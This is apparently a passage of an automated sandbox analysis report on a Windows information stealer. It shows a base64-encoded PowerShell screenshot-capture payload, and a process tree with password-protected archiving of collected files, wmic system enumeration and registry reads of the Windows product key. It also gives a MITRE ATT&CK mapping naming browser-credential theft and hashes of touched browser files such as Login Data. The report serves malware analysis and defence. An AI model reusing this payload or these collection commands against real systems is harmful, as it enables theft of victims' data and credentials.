0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4548
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v1gb11cx\v1gb11cx.cmdline"
        5⤵
        
        PID:3872
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2959.tmp" "c:\Users\Admin\AppData\Local\Temp\v1gb11cx\CSCD0EFC5EAE6974D88856AFDEDC9D8DA4.TMP"
        6⤵
        
        PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4912
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:408
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2096
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1560
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2804
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xMNe4.zip" *"
    3⤵
    PID:3996
  - - C:\Users\Admin\AppData\Local\Temp\_MEI34322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI34322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xMNe4.zip" *
      4⤵
      Executes dropped EXE
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
857f78bd157aa0e136ea854197238481

SHA1
724780e44f90c3282d630d7f0c2d03dfe00fa2ce

SHA256
27e8d40d67f90834d401e7473da96487d95f17c2b289c72878ad75e3bf4b636a

SHA512
4054784ef64e7317ea72de079acf7ff093c08bdc2af8f413441061f97b4639b0634125132de38c23badf12f02a4120e743d8cf10d7797d797fe9a84935e99850

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
912B

MD5
cfcefd57abe4ba58784c6fdf1870fb11

SHA1
f467aa9fa12ef9e5488a4d68e64c263dedb5775e

SHA256
5d0b6918ee1f38ccfd8a44a7ac4778bc7879967b855d394947ab59cde24ee32f

SHA512
42cbcdfd36d231a1b11a6370ea08dd0b20385ea28be3b8931ca4d7c08e805d7850ee13ef468296203a909c36145ec2d83711faa70f25cae920ee68452f20dba0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
864B

MD5
34b2f4337d1c7ef32c0493be22c9a7d9

SHA1
f143cd7adca0b9a431bbba3f5aa2892a2ea41a69

SHA256
81d49d8cc342012bb520eabce2d73cef36c7dbc7873f51b360af1eecb9fe1e8b

SHA512
c56f8d4167207eb26985140bdbb8459e9835f627dac6bf06aeb107f2aa7d7b225286f415faf3dfaf6d05645b794dde6929781782ec4712331590ff92d739f1e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
160KB

MD5
ef4e123abc02b1f90b5cd57666a4df3d

SHA1
f77a6005590b187655fbad281c86a646237a996f

SHA256
9df733379a4979958ba53c9620ece2f34d250852e6eb3628f2c64ba9c5c78020

SHA512
ae067afbe25e5c3f9d89b496365853fd3196cc01dcdfe9124f4ccb4994c5491e8023a371d030a4b11b0ee3a88e96a47eae47a60b164ad6c38b1407149722d28e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data

Filesize
40KB

MD5
ced6820d069e214fd26ea50b28cb981f

SHA1
bdb689d1a72aba6313ada7c9d3f8d863a615a1a8

SHA256
5fa0cd2dcbe13f69f2db62abea027dc3e93258231e189378481a5cd2620ed206

SHA512
da553971eeebab42268ccac67450e99fef2ff32aa811a4168878afc763b8220b5d68a667b151962dfa53f9af1d3510970112d55970515b69630ddd561028ed67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
c4d4abc7c58f25c94d8be56c338c85d0

SHA1
688c91943894cd4cae129baa04cc0748b4cd365f

SHA256
0bc581974e86821feba1977854171a088b426e81e5654387b2199921dd1c71b8

SHA512
d5fa0323e5cd4337d77f030096a22b9ddf5ff8ac8352ead826f7f6a6e882f76f4fc33c8e728e5e4af77cf506abb298e4c7790d7d3c640aa71e1fd232aac889b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
d83490cfd715e31d10e4338fdb22954e

SHA1
88df697fa9c0eaa5ed07842f7550073121d2d6da

SHA256
62ea6d13bf562ad443852ce4f7c9e3e2f11c62aa8d9929b204725bce56657249

SHA512
fa7af93046885fcb8b0e36bbd2ebe8deabe73b8ed5e8b2a96fbfcc58e093446ebc98c5d34c1940996b1a1ad652f49b41e41f45dc9fae606ff06cc18532c7da84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
db5f2825f7bc359ef297e297b441406e

SHA1
42eb89ca10606692b080d5d03f451f81f5625e5a

SHA256
a116e046a19cc7fbbeef42caf0d009206554d448d927805daa9da39fbd8ef31d

SHA512
d3e75fd47ed1f4090842a8b05fc1f8edb1e743af7d13671eb253560e022711abc634344e09e43d8de428581d4a1b2bc7b1027fd15b022e2d815cf4dc2d5ad7f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
e1e6a31242dfbbb5ccc9f8ff00b5c333

SHA1
b5dcf661b0a8e4a74a4b184454c919ee77bfff63

SHA256
5a27a38b1c2974f98910d6618c6c1076e5d1d32401985d42b67fc640555220af

SHA512
c2d14b52290e12e7130d9ea66636de2954370fae8f67873874229602c967f8eb79df287e6c18cbe8344c459c11f169492f1514935f12c31887e1de6e0527c0b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
b39ec6ebdaa2d8bc47388d749627c8eb

SHA1
b9a56ac427ca1bc778495b458bcae437b4cb5266

SHA256
e05d583fd6b4001f52f0c422a72a82a2e91c526c1f7499746621ed60ac02f8ee

SHA512
23400515199d0201e2d627ed9c8c5da44b431a2f5b8b6238a87968afbd53483fd345390c86f8e6a6c8e95ed3715826dd464d7bf61d4880cb82218a19eec27d7f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
4f45b43f1d472fb44fcb6ff6a12cc579

SHA1
e4fa05ea468a9837dbed18580c05d087a44f661d

SHA256
f15d06ba57aa971624bb1f66cd0c512086ade885e213de7e946f2818da394eb9

SHA512
6ebfcb1556299862f94e1ca0afcf63e995373dd85f9b056761dfa8e917a64443d65581a4f0c01fc4028dd7459d44809a6d792dc8f894eb2673e8f7fa7cfb16a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3a7d382c031dfeb255bafad027e6cece

SHA1
a055726b187097b2cf472ce6943b5ed83643fba3

SHA256
d169d9ee00a586a3ac0cd279acd6c2b7fc4757d5fe52365f12309152b190940f

SHA512
e8c56bbbb793913db7b02e9c9b0287af381495cfafe68b5c6751756a571cdd4d5cd440fcca4b276fffea28e0ba5f75875a50e79ed146a1372bd77dca2596ae54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
ed4203d18c8297383a289256d58c2912

SHA1
6a75b6d6a1727f49d879eae8624504763b7d322a

SHA256
ee02d69cb79ffc83592234400df932a34bbeb44b9d7a2adceaf99b03e10fab99

SHA512
a86efccb6400a8bcb48fd05ec47486b7c041857d2bac7d0952f2492210eb0ccd96aaad7d14ef0239e0af7b23aebe4530c4386d072b21f7ea3a88d01be48fab68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
0f82d760eda3860ed315fbb8abfb2225

SHA1
02919b2dad09218a22515f77bf398824bd7bb471

SHA256
498ef228b7629916fe859e0f6d88a55b5282bd61cecf9c67bb1ffd38808ac580

SHA512
d6c7096e6fcc0160c0665fb165b146a8868fa0f6c16eaf209218c607e93c263e4e66cbc2afd0c47338d3caaf7ba81cdef1d9f17d420716e6b1d897941679e6a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
cf8d20dc1045274d093010ebb568a8bd

SHA1
04ef33d1a69531439e9997475dbf8ad69ba80cff

SHA256
7250e46b838e56fa3458e70f2aca4de458d1ebb327651881f0744421e361a626

SHA512
325aa178a8f354fbc2c4f2cb4a461dfaa145132fc86557bfbd8c277bf9fc0e51575e6d925d269a1594277f39926c35d552d0ac8a7c6d94e60898a462289d637a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
ef9a1597dc3c99848bc83f4721edc22c

SHA1
a02d108201d3f45f56de5992cbf1db8384bd947d

SHA256
cfbddd4deabb27a9ef574531d1af4f67a4b92fd70e41dcebbe9ea4ba180ff191

SHA512
41a9db54ab86cd343eb24bcf044df3a944bcb7a727f312fe2c756c7eb1e21a92f757f4bbf910552d5345b65147d2433da7a5e781913ddb3f5800272195996f29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
924386e398e090c36045a5e89e19949b

SHA1
4d94e42339b6dca419c3bf11b4c9623253b52dab

SHA256
93db2d387d65a229f7fe5fd88a7a0200f5db055ee7109fca5434686a82370454

SHA512
d245f01d4ec9da1a46df74cc50d88c3ee6cf2b8af2366729b313b1d1d8d4a1b74a879a84f1fdb84b3b4949cfe7f7a191ab775c79b54698905ee571e4eb54e4bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bcc715a7-f7cd-4a27-a0dc-28122ff00bb1\index-dir\the-real-index

Filesize
2KB

MD5
5b5ae8ec62cbae1ac7558ae8382373f2

SHA1
46edfd7dc0e00f4c0fb61a21a0beedf97b72e39c

SHA256
d431b34cc12c212296148bb6dc53794d0190f4f8d14bbda7b049806854ab820c

SHA512
0330f2abfdcc223c281253ee0dd0c5e941c4230cce4ae869f062a350283c4fddfae0df907329bc7688257cae4d63ad324d40c7f01ef2850c3984d9ebf9202b16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bcc715a7-f7cd-4a27-a0dc-28122ff00bb1\index-dir\the-real-index~RFe58eac8.TMP

Filesize
48B

MD5
f3a74cc0e705a5164519639983af94cb

SHA1
d4b6aa8d28c949b24ff006a56a836a1880371047

SHA256
1351a887226d4d6f889af9bb4e305bf1655c385c95aea236259e1772fd6037fd

SHA512
70a313f9914e32804f1af11413f2d57c95a6ea26ea7696f401a376daf361db5d8a42d9f3a653907844fa92046d15596d67e2dbed9eacc10ab4bc9fe8997b0f4e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\df214bf9-5f00-45e5-8232-2803c278aa10\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
8847509e5df72699f5bd8b77d869daba

SHA1
cd1fdfe5697ba298c7833dc1380f277b18f465d5

SHA256
524cb128ea1f557f3e9acec2466c0d48b6131bd75ec882034f0d492bde260b9f

SHA512
e5570bd17b408d538a97c9a7fcc22a5f02f5035cda6db76ac98815eb25264e21370882fb306e678fdc3758bb97a4e776822f1e4ad15d7583cafcfa8db03ac94e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
2735c40bd31d7b66e8e2093b40b905c2

SHA1
305aa9ed4a226b09bc124266ad95343ded537b74

SHA256
b18c40656b5f2a9244fc1534be317ce39e010fb6c9fe14780b460c23e0f65894

SHA512
79c1dce822ae21d9895274c36311e253435ee8d31f3044dfcc3c8cd73d76c4badb5ca734f15b6d844a78d166cb71acc4a610f7bf7fd079fc8a639049edcbef23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
42cd0723323da50ec3f64b3cd1ffa0e3

SHA1
b954233c446ed679d488fcf04ce9af6462d8c334

SHA256
d7646443453c975816764d10f28a9ce8d5077cfd7578a64176b9048bb8fd371b

SHA512
5170b8b928e29a5deb4568764d01f2d543a49d320328070e016929a9ac84539e74b68b7811b501d597d081f8331a1d89f1f03bd715c37c5874be6df45f14d7e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58da5d.TMP

Filesize
119B

MD5
d660355e6486ce97fc52f593a8a9d32f

SHA1
c91e64c8252eb2772b792ddacba24114e174f7d3

SHA256
33b1b0939596691f92168a8a759d3644b66d0f39089125540f41304a11f5efbc

SHA512
84be8aac48f7a6fd8d1e41cd5c185fcb01c6b2abc1a92996556e8e366d5df2663eaf1df45bf75047a7dc65c652ad3e14e39ed184c496b07a1d387e2cf0d570b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
2d4c55a0e6b92f79dd4d3117f8695c9d

SHA1
05534235bcf1abefe9febbcbe596cd3d5aaff3ed

SHA256
4e79a99104b82121cfdf44ce4cd08185c7528d6c9ca2ef6ce98a0223bf03248a

SHA512
8ba81e7f7b64593260baa2afe47d6196ae0c9ad169814f89952a58054738d41adcbbb0c37b305b414818d07975d86cc126edad304390a54c324bddfc94e3b6b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir804_120404074\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
206fd9669027c437a36fbf7d73657db7

SHA1
8dee68de4deac72e86bbb28b8e5a915df3b5f3a5

SHA256
0d17a989f42bc129aca8e755871a7025acb6292ce06ca2437e95bedbc328fa18

SHA512
2c89878ec8466edf1f214d918aefc6a9b3de46d06ffacff4fdb85566560e94068601b1e4377d9d2eabefdc1c7f09eb46b00cf4545e377cc84a69edf8e57e48b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir804_120404074\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
529a0ad2f85dff6370e98e206ecb6ef9

SHA1
7a4ff97f02962afeca94f1815168f41ba54b0691

SHA256
31db550eb9c0d9afd316dc85cdfd832510e2c48e7d37d4a610c175667a4599c6

SHA512
d00e2d741a0a6321c92a4aab632f8f3bafd33c0e2875f37868e195ed5e7200a647b4c83358edcef5fc7acbc5c57f70410903f39eac76e23e88a342ac5c9c21cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir804_697720617\Icons Monochrome\16.png

Filesize
214B

MD5
1b3a4d1adc56ac66cd8b46c98f33e41b

SHA1
de87dc114f12e1865922f89ebc127966b0b9a1b7

SHA256
0fb35eacb91ab06f09431370f330ba290725119417f166facaf5f134499978bd

SHA512
ce89a67b088bae8dcd763f9a9b3655ed90485b24646d93de44533744dfcf947c96571e252d1ad80bdec1530ff2b72b012e8fff7178f1b4e957090f0f4c959e0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

Filesize
114KB

MD5
bb904466ffeed6975875d849101d8175

SHA1
f71bdf9a9b224f0422c12159f38c4c14c1a5f1ac

SHA256
d351e7f16fcf3db19a30f59c2227d7cfe80be596049f88acfec387cd127412f7

SHA512
f05bf686557ab3c22afb0d51c8060f4147e0217856e167bc323c537eaf1fe0ac376ca8c090532710b7bc540bdf7a96bd4a2d83f2073e0154432508a804017dcb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1

Filesize
264KB

MD5
ba3bfa5f39c41c4e064478bbac74a334

SHA1
17c5bb87295f094cbf5c0b7158b38ab26b9e9a8f

SHA256
06f551851d5116738e4bb5a09e7c1d0c5f7cf1352c8bb80fee7c6dce30a592b0

SHA512
b951bf89331a567b23b3a79b254318fc1a082a6cef68572a4811f7decbf5d9daaaf41408f5b95f64994020dd2ea350348a1d9319ce5fe98b0111308f574ca4ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
6237a5a23a79fb8c261b0d0d31561fd5

SHA1
43153ef783ad2b49d793069266e9e229e7578661

SHA256
396439f88ea6dea88a063aa743ca12016771283bfb60bfe9c6b874954e731eb4

SHA512
2af85e84004e201c428fd98099f3f871d54efef72235057ba8414dafdf6bf30f2683c40df4ff351ff40d67933243c0c40d17e626f3b0b42db4d5ed54ca91b926

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
ff2ac73986d966c80a5ea2764285b166

SHA1
57cebed8c163e4f36eee6756e8567e59783457e3

SHA256
b4c47d63da4f916bb4bb29ae2492a5514f4fd78fa4f790c8dcbd73346ac57e3b

SHA512
d2c8420bc0359d5d57e2b57bfc17e4cafca48f81c17ba92101523f9e6e2bf596b144b51a802b78ffe3d203c73e48dfcf6deda093ed4b5cb9fadca9d19e548025

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
293ef99d59dee846f0f0dd8fd066bd40

SHA1
0b3fe5c0080231cb93ed4c175256ff632c813ec2

SHA256
6d5497f7c04f1c5f47955480a4c44ebf1c6d7c86cda67291fb63caf0daf7ce95

SHA512
db21c8813dc723ba5aa9e7b99115fed667baf7e9f6dd863ede5452c7158ab22ece945b6d77b2edb63bac5644e4752d28af54a242d406f7e21e2c841e41e914ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c0a1774f8079fe496e694f35dfdcf8bc

SHA1
da3b4b9fca9a3f81b6be5b0cd6dd700603d448d3

SHA256
c041da0b90a5343ede7364ccf0428852103832c4efa8065a0cd1e8ce1ff181cb

SHA512
60d9e87f8383fe3afa2c8935f0e5a842624bb24b03b2d8057e0da342b08df18cf70bf55e41fa3ae54f73bc40a274cf6393d79ae01f6a1784273a25fa2761728b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e11c77d0fa99af6b1b282a22dcb1cf4a

SHA1
2593a41a6a63143d837700d01aa27b1817d17a4d

SHA256
d96f9bfcc81ba66db49a3385266a631899a919ed802835e6fb6b9f7759476ea0

SHA512
c8f69f503ab070a758e8e3ae57945c0172ead1894fdbfa2d853e5bb976ed3817ecc8f188eefd5092481effd4ef650788c8ff9a8d9a5ee4526f090952d7c859f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
936B

MD5
d3d89646523c3770bbd7da9f0d2186c2

SHA1
3b66ea04295f8d3bd5f6cfe96b6c2d61559fb40e

SHA256
ee6b9232775918ad83d0dae233e09b27c8ae525e80a2b429c906d89ad20fefa6

SHA512
